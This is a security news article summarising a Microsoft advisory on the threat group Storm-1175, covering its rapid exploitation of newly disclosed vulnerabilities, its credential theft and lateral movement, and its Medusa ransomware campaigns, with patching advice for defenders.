A China-linked, financially motivated threat group tracked by Microsoft as Storm-1175 has been observed executing rapid ransomware campaigns by exploiting newly disclosed vulnerabilities, usually within days (and sometimes within 24 hours) of public disclosure.
According to a new advisory by Microsoft Threat Intelligence, the group focuses on unpatched, internet-facing systems, using “N-day” vulnerabilities, flaws that are publicly known, but not yet widely remediated. In some cases, the actor has also exploited zero-day vulnerabilities prior to disclosure.
Researchers observed exploitation of more than 16 vulnerabilities since 2023, including flaws in Microsoft Exchange, Ivanti systems, and remote management tools. Among the most recent, Storm-1175 exploited CVE-2026-23760, an authentication bypass in SmarterMail, and CVE-2025-10035 in GoAnywhere MFT, both as zero-days before patches were available.
Rapid Exploitation and Lateral Movement
After initial access is gained, Storm-1175 moves quickly. In some incidents, the group progressed from entry to ransomware deployment in less than one day, though most attacks were observed to unfold over five to six days.
The attackers establish persistence by creating administrative accounts, then move laterally using legitimate tools (such as PowerShell and PsExec) and RMM software like Atera and AnyDesk. These tools, commonly used by IT teams, can also help attackers hide within normal activity.
Credential theft is a key step, Microsoft warned. Storm-1175 uses tools such as Mimikatz and Impacket to extract passwords from memory and access systems of interest, including Active Directory databases. The group also disables or modifies antivirus protections to avoid detection.
Before deploying the Medusa ransomware payload, attackers often extract sensitive data using Rclone and Bandizip, which enable double extortion, while also encrypting systems and threatening to leak stolen data.
Storm-1175’s playbook is built on a single assumption: that most organisations will not patch internet-facing systems before an attacker can exploit a newly disclosed flaw. For security leaders, the advisory is a prompt to assess how quickly their teams can move from disclosure to remediation on perimeter-facing products, particularly mail servers, file transfer tools, and RMM platforms.
Organizations in healthcare, education, finance, and professional services should treat exposure windows as active threat periods, not just compliance checkboxes.
